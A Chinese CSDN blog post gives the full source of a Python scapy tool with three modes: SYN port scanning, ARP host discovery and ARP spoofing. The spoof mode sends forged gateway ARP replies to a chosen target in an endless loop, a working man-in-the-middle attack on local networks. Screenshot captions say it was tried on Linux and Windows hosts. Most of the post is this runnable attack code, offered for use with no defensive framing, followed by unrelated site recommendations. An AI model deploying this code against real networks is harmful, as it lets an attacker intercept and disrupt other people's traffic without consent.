Python内网扫描及arp欺骗小工具

运行过程

ip_manager.py

先来看看效果

synscan
在这里插入图片描述

arping

在这里插入图片描述

arpspoof


在这里插入图片描述

攻击

在这里插入图片描述

结果

linux
在这里插入图片描述

windows

在这里插入图片描述

完整代码

#! /usr/bin/env python
# -*- coding:utf-8 -*-

import sys
import getopt
import time
import netifaces
from scapy.all import *

target = ""
scan_type = ""
port = 0
gateway = ""


# 帮助函数
def help_message():
    print()
    print("You can manage your ip like this:")
    print("      ip_manager.py -t target_ip -p port --scan_type=type")
    print("[*]example:python ip_manager.py -t 127.0.0.1 -p 7777 --scantype==syn_scan")
    print()
    print("-t    specify the ip you wanna scan")
    print()
    print("-p    specify the port you wanna scan")
    print()
    print("-i    to get host network card information")
    print()
    print("--scan_type= specify the scan type you wanna use")
    print()
    print("scantype:[syn_scan,arp_ping,arp_spoof]")
    print("[*]example:python ip_manager.py -t 127.0.0.1 -p 80 --scan_type=syn_scan ")

# 获取本机网卡信息
def information():
    print ("Net Card Information:")
    gateway = netifaces.gateways()['default'][2][0]
    nic_name = netifaces.gateways()['default'][2][1]
    for interface in netifaces.interfaces():
        if interface == nic_name:
            ip = netifaces.ifaddresses(nic_name)[2][0]['addr']
            mac_addr = netifaces.ifaddresses(nic_name)[17][0]['addr']
            ip_mask = netifaces.ifaddresses(nic_name)[2][0]['netmask']
    print("Gateway:",gateway)
    print("NIC Name:",nic_name)
    print("NIC MAC Address:",mac_addr)
    print("IPV4 Address:", ip)
    print("IP Netmask:",ip_mask)
    return mac_addr,gateway, nic_name

def main():
    global target
    global scan_type
    global port
    global gateway
    # 解析函数
    try:
        opts, args = getopt.getopt(sys.argv[1:], "t:s:p:hi",
                                   ["target=", "scan_type=", "help","info", "port="])
    except Exception as e:
        print(str(e))
        help_message()
        sys.exit(0)

    for opt, value in opts:
        if opt in ["-h", "--help"]:
            help_message()
        elif opt in ["-t", "--target"]:
            target = value
        elif opt in ["-s","--scan_type"]:
            scan_type = value
        elif opt in ["-p", "--port"]:
            port = int(value)
        elif opt in ["-i","--info"]:
            information()
            
    if scan_type == "syn_scan":
        syn_scan()
    elif scan_type == "arp_ping":
        arp_ping()
    elif scan_type == "arp_spoof":
        arp_spoof()

# syn扫描端口
def syn_scan():
    global target
    global port
    ports = [20,21,22,23,25,69,80,81,109,389,443,1433,1521,2049,3306,3389,5432,8080,27017]
    if port:
        ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=port),timeout=3)
    else:
        ans, unans = sr(IP(dst = target)/TCP(sport=RandShort(),dport=ports),timeout=3)
    for sent,received in ans:
        if received.haslayer(TCP) and str(received[TCP].flags) == "SA":
                print("Port " + str(sent[TCP].dport) + " of " + target + " is OPEN!")
        elif received.haslayer(TCP) and str(received[TCP].flags) == "RA":
                print("Port " + str(sent[TCP].dport) + " of " + target + " is closed!")
        elif received.haslayer(ICMP) and str(received[ICMP].type) == "3":
                print("Port " + str(sent[TCP].dport) + " of " + target + " is filtered!")

    for sent in unans:
        print(str(sent[TCP].dport) + " is unanswered!")
    sys.exit(0)

# arp存活主机扫描
def arp_ping():
    global target
    ans, unans = srp(Ether(dst="ff:ff:ff:ff:ff:ff")/ARP(pdst=target),timeout=3)
    for sent, received in ans:
        print(received[Ether].src+"->"+received[ARP].psrc+" is alive")
    sys.exit(0)

# arp欺骗
def arp_spoof():
    global target
    mac_addr,gateway, nic_name=information()
    # 获取目标mac地址
    target_mac = getmacbyip(target)
    if target_mac is None:
        print("[-] Error: Could not resolve targets MAC address")
        sys.exit(1)
    print("ARP Spoofing...")
    # 构造响应包
    pkt = Ether(src=mac_addr, dst=target_mac) / ARP(hwsrc=mac_addr, psrc=gateway, hwdst=target_mac, pdst=target)
    while True:
        sendp(pkt, inter=2, iface=nic_name)

if __name__ == "__main__":
    main()

参考

《python黑帽子编程 黑客与渗透测试编程》

参考链接

Scapy-port-scanner/port_scanner.py at master · cptpugwash/Scapy-port-scanner · GitHub

python scapy的用法之ARP主机扫描和ARP欺骗 - 雨中落叶 - 博客园

Logo
CSDN学习社区

CSDN联合极客时间,共同打造面向开发者的精品内容学习社区,助力成长!

更多推荐

嵌入式作业(七):基于Ardunio的STM32串口通信

嵌入式作业(七)0作业要求1Ardunio 完成STM32的串口通信(1)安装Ardunio IDE(2)stm32串口通信2关于 stduino IDE0作业要求安装 Ardunio IDE 和相关软件支持库,在Ardunio 完成STM32板子的串口通信程序:(1)持续向串口输出“Hello world!”;(2)当接收到“stop!”时,停止输出。网上有一个国人版的MCU集成开发平台, st

avatar CSDN学习社区

JDBC详解

JDBC文章目录JDBC什么是JDBC?JDBC驱动程序:Java使用JDBC访问数据库的步骤:设置classpath:Oracle连接字符串的书写格式:简单的例子:常用数据库的驱动程序及JDBC URL:Oracle数据库:SQL Server数据库MySQL数据库Access数据库PreparedStatement接口:JNDI-数据源(Data Source)与连接池(Connection

avatar CSDN学习社区

“模式识别与机器学习”学习笔记no2.再谈感知机

接**上篇:上篇主要进行了PLA,Pocket算法的理论过程分析和在给定数据集上利用pocket算法对数据集进行分类学习,得到错分数量最少的分类面。上篇中pocket算法的过程已经进行了编程和测试,框架已经建立了起来,这一篇主要上篇中没有提到或涉及不深的几个问题。1.数据集的构造。上篇是直接使用了题目给的向量,这次来根据正态分布来产生数据集。np.random.normal函数可以根据均值和方差生

avatar CSDN学习社区